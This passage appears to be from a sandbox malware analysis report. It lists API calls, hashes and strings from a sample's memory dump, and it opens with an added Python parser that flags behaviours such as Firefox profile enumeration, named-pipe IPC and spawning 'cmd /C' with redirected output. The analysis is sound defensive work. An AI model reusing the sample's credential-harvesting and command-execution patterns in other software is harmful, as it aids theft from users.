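The function blocks above are emitted in a fixed layout (Memory Dump Source, Similarity, APIs with direct calls and "Part of subcall function" lines, optional Strings), which makes them easy to mine for indicators in bulk rather than reading block by block. The following parser is an added example, not Joe Sandbox code: it consumes a trimmed excerpt of three blocks copied from this page (the CallNamedPipeA block, the Firefox-profiles block, and the block whose subcall builds `cmd /C "%s> %s1"`), resolves which APIs each function reaches directly or through callees, and applies a few behaviour heuristics. The heuristics (`behaviour_flags`) are this example's own assumptions about what those API and string combinations indicate, not a classification the report makes.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: three blocks from this report, trimmed to a few API lines each.
SAMPLE_REPORT = r"""
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
APIs
  • lstrlen.KERNEL32(?,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
APIs
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
APIs
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
"""

# "Name.MODULE(args)" or "Name.MODULE ref:" (no argument list for CRT-style calls such as memset).
API_CALL_RE = re.compile(r"(\w+)\.(KERNEL32|NTDLL|ADVAPI32|SHLWAPI|USER32)\b(?:\((.*)\))?")
SUBCALL_RE = re.compile(r"Part of subcall function ([0-9A-F]{8}):")


@dataclass
class FunctionBlock:
    api_id: str = ""
    string_id: str = ""
    direct_apis: list = field(default_factory=list)
    subcall_apis: dict = field(default_factory=dict)  # callee address -> API names
    arguments: list = field(default_factory=list)     # raw argument strings, for literal search
    strings: list = field(default_factory=list)

    def all_apis(self) -> set:
        """APIs reached directly or via any listed callee."""
        names = set(self.direct_apis)
        for apis in self.subcall_apis.values():
            names.update(apis)
        return names


def parse_blocks(text: str) -> list:
    """Split report text into FunctionBlocks, one per 'Memory Dump Source' heading."""
    blocks, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FunctionBlock()
            blocks.append(cur)
            section = "source"
            continue
        if cur is None or not line:
            continue
        if line in ("Similarity", "APIs", "Strings"):
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line.lstrip("• ").strip()
        if section == "Similarity":
            if body.startswith("API ID:"):
                cur.api_id = body.split(":", 1)[1].strip()
            elif body.startswith("String ID:"):
                cur.string_id = body.split(":", 1)[1].strip()
        elif section == "APIs":
            m = API_CALL_RE.search(body)
            if not m:
                continue
            callee = SUBCALL_RE.search(body)
            if callee:
                cur.subcall_apis.setdefault(callee.group(1), []).append(m.group(1))
            else:
                cur.direct_apis.append(m.group(1))
            if m.group(3):
                cur.arguments.append(m.group(3))
        elif section == "Strings":
            cur.strings.append(body.split(", xrefs:", 1)[0].strip())
    return blocks


def behaviour_flags(block: FunctionBlock) -> list:
    """Heuristic labels (this example's assumptions) for API/string combinations."""
    apis = block.all_apis()
    text = " ".join([block.string_id, *block.strings, *block.arguments])
    flags = []
    if "Firefox\\Profiles" in text and {"FindFirstFileW", "FindNextFileW"} <= apis:
        flags.append("enumerates Firefox profile directory")
    if apis & {"CallNamedPipeA", "CallNamedPipeW"}:
        flags.append("named-pipe IPC")
    if "CreateProcessA" in apis and re.search(r"cmd /C .*>", text):
        flags.append("spawns cmd.exe with output redirected to a file")
    if "ReadFile" in apis and apis & {"CreateFileA", "CreateFileW"}:
        flags.append("reads a file it opened")
    return flags


if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE_REPORT)):
        print(i, sorted(b.all_apis()), behaviour_flags(b))
```

Run on the full report text instead of the excerpt to get one line per function; the subcall map is what lets the Firefox block be flagged even though the directory walk (FindFirstFileW/FindNextFileW) lives in callee 001D6F2E rather than in the function itself.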
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
